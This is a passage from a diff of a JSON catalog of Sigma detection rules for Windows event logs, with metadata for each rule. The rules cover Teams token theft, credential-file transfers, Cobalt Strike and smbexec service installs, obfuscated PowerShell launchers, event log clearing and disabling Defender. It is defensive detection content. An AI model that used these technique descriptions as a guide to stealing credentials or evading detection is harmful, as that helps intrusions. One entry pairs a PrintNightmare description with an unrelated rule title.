tokens and accounts of Microsoft Teams desktop application.", + "meta": { + "author": "@SerkinValery", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_teams_suspicious_objectaccess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", + "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "value": "Suspicious Teams Application Related ObjectAcess Event" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares" + }, + { + "description": "This rule triggers on user accounts that are added to the local Administrators group, which could be legitimate activity or a sign of privilege escalation activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/14", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_user_added_to_local_administrators.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_added_to_local_administrators.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078", + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "c265cf08-3f99-46c1-8d59-328247057d57", + "value": "User Added to Local Administrators" + }, + { + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "value": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'" + }, + { + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "meta": { + "author": "Patrick Bareiss", + "creation_date": "2019/04/18", + "falsepositive": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "filename": "win_security_user_creation.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "value": "Local User Creation" + }, + { + "description": "Detects the loading of drivers via 'SeLoadDriverPrivilege' required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools.\nSo you have to work with a whitelist to find the bad stuff.\n", + "meta": { + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "creation_date": "2019/04/08", + "falsepositive": [ + "Other legimate tools loading drivers. There are some: Sysinternals, CPU-Z, AVs etc. - but not much. You have to baseline this according to your used products and allowed tools. Also try to exclude users, which are allowed to load drivers." 
+ ], + "filename": "win_security_user_driver_loaded.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "f63508a0-c809-4435-b3be-ed819394d612", + "value": "Suspicious Driver Loaded By User" + }, + { + "description": "Detects a user log-off activity. Could be used for example to correlate information during forensic investigations", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_logoff.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags" + }, + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event" + }, + { + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. 
It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + ], + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", + "meta": { + "author": "Florian Roth, Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "creation_date": "2017/08/22", + "falsepositive": [ + "Unknown 
(data set is too small; further testing needed)" + ], + "filename": "win_security_wmi_persistence.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmi_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "f033f3f3-fd24-4995-97d8-a3bb17550a88", + "value": "WMI Persistence - Security" + }, + { + "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_defender_load_unsigned_dll.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", + "value": "Microsoft Defender Blocked from Loading Unsigned DLL" + }, + { + "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml", + "level": "high", + 
"logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "value": "Unsigned Binary Loaded From Suspicious Location" + }, + { + "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Legitimate use of Hybrid Connection Manager via Azure function apps." + ], + "filename": "win_hybridconnectionmgr_svc_running.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1554" + ] + }, + "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", + "value": "HybridConnectionManager Service Running" + }, + { + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Packages or applications being legitimately used by users or administrators" + ], + "filename": "win_shell_core_susp_packages_installed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": 
[ + "https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "83c161b6-ca67-4f33-8ad0-644a0737cf07", + "value": "Suspicious Application Installed" + }, + { + "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", + "meta": { + "author": "Florian Roth, KevTheHermit, fuzzyf10w", + "creation_date": "2021/06/30", + "falsepositive": [ + "Account fallback reasons (after failed login with specific account)" + ], + "filename": "win_susp_failed_guest_logon.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/KevTheHermit/status/1410203844064301056", + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/afwu/PrintNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "value": "Suspicious Rejected SMB Guest Logon From IP" + }, + { + "description": "Detects repeated failed (outgoing) attempts to mount a hidden share", + "meta": { + "author": "Fabian Franz", + "creation_date": "2022/08/30", + "falsepositive": [ + "Legitimate administrative activity", + "Faulty scripts" + ], + "filename": "win_susp_failed_hidden_share_mount.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/moti_b/status/1032645458634653697", + "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml" + ], + "tags": [ + "attack.t1021.002", + "attack.lateral_movement" + ] + }, + "uuid": "1c3be8c5-6171-41d3-b792-cab6f717fcdb", + "value": "Failed Mounting of Hidden Share" + }, + { + "description": "Detects application popup reporting a failure of the Sysmon service", + "meta": { + "author": "Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_application_sysmon_crash.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_application_sysmon_crash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "value": "Sysmon Crash" + }, + { + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/31", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_carbonpaper_turla.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_carbonpaper_turla.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "value": "Turla Service Install" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": 
"2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_apt_chafer_mar18_system.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_chafer_mar18_system.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "value": "Chafer Activity - System" + }, + { + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_stonedrill.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_stonedrill.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1543.003" + ] + }, + "uuid": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "value": "StoneDrill Service Install" + }, + { + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/11/23", + "falsepositive": [ + "Unlikely" + ], + "filename": "win_system_apt_turla_service_png.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_apt_turla_service_png.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1543.003" + ] + }, + "uuid": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "value": "Turla PNG Dropper Service" + }, + { + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_cobaltstrike_service_installs.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.sans.org/webcasts/119395", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", + "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" + ] + }, + "uuid": "5a105d34-05fc-401e-8553-272b45c1522d", + "value": "CobaltStrike Service Installations - System" + }, + { + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "meta": { + "author": "Ján Trenčanský, frack113", + "creation_date": "2020/07/28", + "falsepositive": [ + "Administrator actions", + "Auto updates of Windows Defender causes restarts" + ], + "filename": "win_system_defender_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_defender_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6c0a7755-6d31-44fa-80e1-133e57752680", + "value": "Windows Defender Threat Detection Disabled - Service" + }, + { + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/01/10", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "filename": "win_system_eventlog_cleared.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ] + }, + "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "value": "Eventlog Cleared" + }, + { + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "meta": { + "author": "Omer Faruk Celik", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_hack_smbexec.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ 
+ "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_hack_smbexec.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1021.002", + "attack.t1569.002" + ] + }, + "uuid": "52a85084-6989-40c3-8f32-091e12e13f09", + "value": "smbexec.py Service Installation" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - System" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_obfuscated_iex_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - System" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation STDIN+ Launcher - System" + }, + { + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "value": "Invoke-Obfuscation VAR+ Launcher - System" + }, + { + "description": "Detects Obfuscated Powershell via COMPRESS 
OBFUSCATION", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_compress_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_compress_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "175997c5-803c-4b08-8bb0-70b099f47595", + "value": "Invoke-Obfuscation COMPRESS OBFUSCATION - System" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_rundll_services.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_rundll_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER - System" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", 
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_stdin_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "487c7524-f892-4054-b263-8a0ace63fc25", + "value": "Invoke-Obfuscation Via Stdin - System" + }, + { + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_clip_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "value": "Invoke-Obfuscation Via Use Clip - System" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_mshta_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "value": "Invoke-Obfuscation Via Use MSHTA - System" + }, + { + "description": "Detects 
Obfuscated Powershell via use Rundll32 in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_use_rundll32_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "value": "Invoke-Obfuscation Via Use Rundll32 - System" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_invoke_obfuscation_via_var_services.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_invoke_obfuscation_via_var_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System" + }, + { + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/09", + "falsepositive": [ + "Unknown" + ], + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "level": "high", + "logsource.category": "No established 
